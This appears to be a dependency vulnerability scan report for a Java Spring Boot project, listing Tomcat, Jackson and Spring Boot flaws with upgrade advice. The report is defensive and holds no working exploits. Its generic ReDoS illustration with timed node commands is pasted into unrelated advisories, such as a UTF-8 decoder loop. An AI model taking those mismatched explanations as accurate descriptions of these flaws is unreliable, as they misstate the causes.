Vulnerabilities	57 via 198 paths
Dependencies	43
Source	GitHub
Commit	ec53d61d

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications

Severity

Critical
1
High
18
Medium
27
Low
11

Status

Open
57
Patched
0
Ignored
0

critical severity

Insecure Defaults

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.15.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.15.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Insecure Defaults. The defaults settings for the CORS filter are insecure and enable supportsCredentials for all origins.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 7.0.89, 8.0.53, 8.5.32, 9.0.9 or higher.

References

Insecure Defaults vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: com.fasterxml.jackson.core:jackson-core
Introduced through: com.fasterxml.jackson.datatype:jackson-datatype-joda@2.8.11 and org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › com.fasterxml.jackson.datatype:jackson-datatype-joda@2.8.11 › com.fasterxml.jackson.core:jackson-core@2.8.11

Remediation: Upgrade to com.fasterxml.jackson.datatype:jackson-datatype-joda@2.15.0.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › com.fasterxml.jackson.datatype:jackson-datatype-joda@2.8.11 › com.fasterxml.jackson.core:jackson-databind@2.19.0 › com.fasterxml.jackson.core:jackson-core@2.8.11
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › com.fasterxml.jackson.core:jackson-databind@2.19.0 › com.fasterxml.jackson.core:jackson-core@2.8.11

Overview

com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation

Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing input size validation when performing numeric type conversions. A remote attacker can exploit this vulnerability by causing the application to deserialize data containing certain numeric types with large values, causing the application to exhaust all available resources.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.core:jackson-core to version 2.15.0-rc1 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS) in the implementation of the HTTP/2 protocol. An attacker can cause a denial of service (including via DDoS) by rapidly resetting many streams through request cancellation.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.94, 9.0.81, 10.1.14, 11.0.0-M12 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Insufficient Session Expiration

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.7.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.7.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Insufficient Session Expiration due to an infinite timeout being assigned to an open connection improperly, in http2/Stream.java. An attacker can force this situation by sending an HTTP/2 stream with excessive headers, causing an out-of-memory error or exhausting maxConnections.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.90, 10.1.25, 11.0.0-M21 or higher.

References

Insufficient Session Expiration vulnerability report

high severity

Improper Input Validation

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.18.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.18.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Improper Input Validation due to the improper parsing of HTTP trailer headers. An attacker can manipulate the server into treating a single request as multiple requests by sending a trailer header that exceeds the header size limit. This could lead to request smuggling when the server is behind a reverse proxy.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.96, 9.0.83, 10.1.16, 11.0.0-M10 or higher.

References

Improper Input Validation vulnerability report

high severity

Remote Code Execution

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.21.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.21.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Remote Code Execution due to a bug in the way the underlying Java Runtime Environment (JRE) passes command line arguments to windows systems when the option enableCmdLineArguments is enabled.

The CGI Servlet in Apache Tomcat when enabled, will pass user input to the underlying operating system for command line parsing. However, this process is not consistent and may allow the injection of additional arguments. This misconfiguration could be abused by attackers to execute code on an application's underlying operating system.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 7.0.94, 8.5.40, 9.0.18 or higher.

References

Remote Code Execution vulnerability report

high severity

Remote Code Execution (RCE)

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.15.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.15.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). If an attacker is able to control the contents and name of a file on the server; and the server is configured to use the PersistenceManager with a FileStore; and the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.0-M5, 9.0.35, 8.5.55, 7.0.104 or higher.

References

Remote Code Execution (RCE) vulnerability report

high severity

Insecure Temporary File

Vulnerable module: org.springframework.boot:spring-boot
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.2.11.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.2.11.RELEASE.

Overview

Affected versions of this package are vulnerable to Insecure Temporary File via the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method, allowing for temporary directory hijacking and privilege escalation.

Remediation

Upgrade org.springframework.boot:spring-boot to version 2.2.11.RELEASE or higher.

References

GitHub Fix Commit

Insecure Temporary File vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.10.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.10.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS). When Tomcat is configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially-crafted packet could be used to trigger an infinite loop resulting in a denial of service.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.4, 8.5.64, 9.0.44 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.15.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.15.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS). A specially crafted sequence of HTTP/2 requests could trigger high CPU usage for several seconds. If a sufficient number of such requests were made on concurrent HTTP/2 connections, the server could become unresponsive.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.56, 9.0.36, 10.0.0-M6 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.21.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.21.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to not sending WINDOW_UPDATE messages for the connection window, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.

Note: This vulnerability is due to an incomplete fix for CVE-2019-0199.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.40, 9.0.20 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.20.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.20.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS). The HTTP/2 implementation accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API's blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

A The string must start with the letter 'A'
(B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

CCC
CC+C
C+CC
C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String	Number of C's	Number of steps
ACCCX	3	38
ACCCCX	4	71
ACCCCCX	5	136
ACCCCCCCCCCCCCCX	14	65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.38, 9.0.16 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.15.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.15.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS) via the UTF-8 decoder. When handling some special characters, the decoder may enter an infinite loop, thus denying service to other requests.

Details

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

A The string must start with the letter 'A'
(B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

CCC
CC+C
C+CC
C+C+C.

From there, the number of steps the engine must use to validate a string just continues to grow.

String	Number of C's	Number of steps
ACCCX	3	38
ACCCCX	4	71
ACCCCCX	5	136
ACCCCCCCCCCCCCCX	14	65,553

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 7.0.90, 8.0.52, 8.5.32, 9.0.10 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.9.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.9.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS) when processing a crafted HTTP/2 request. If the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.99, 9.0.86, 10.1.19, 1.0.0-M17 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-websocket
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.9.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) when a WebSocket client can keep a WebSocket connection open which is leading to increased resource consumption.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-websocket to version 8.5.99, 9.0.86, 10.1.19, 1.0.0-M17 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: org.springframework.boot:spring-boot-autoconfigure
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.15.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) if Spring MVC is used together with a reverse proxy cache.

Specifically, an application is vulnerable if all of the conditions are true:

The application has Spring MVC auto-configuration enabled. This is the case by default if Spring MVC is on the classpath.
The application uses Spring Boot's welcome page support, either static or templated.
The application is deployed behind a proxy which caches 404 responses.

The application is NOT vulnerable if any of the following are true:

Spring MVC auto-configuration is disabled. This is true if WebMvcAutoConfiguration is explicitly excluded, if Spring MVC is not on the classpath, or if spring.main.web-application-type is set to a value other than SERVLET.
The application does not use Spring Boot's welcome page support.
There is no proxy which caches 404 responses.

Workaround

Users who are unable to upgrade should configure the reverse proxy not to cache 404 responses and/or not to cache responses to requests to the root (/) of the application.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.springframework.boot:spring-boot-autoconfigure to version 2.5.15, 2.6.15, 2.7.12, 3.0.7 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: org.yaml:snakeyaml
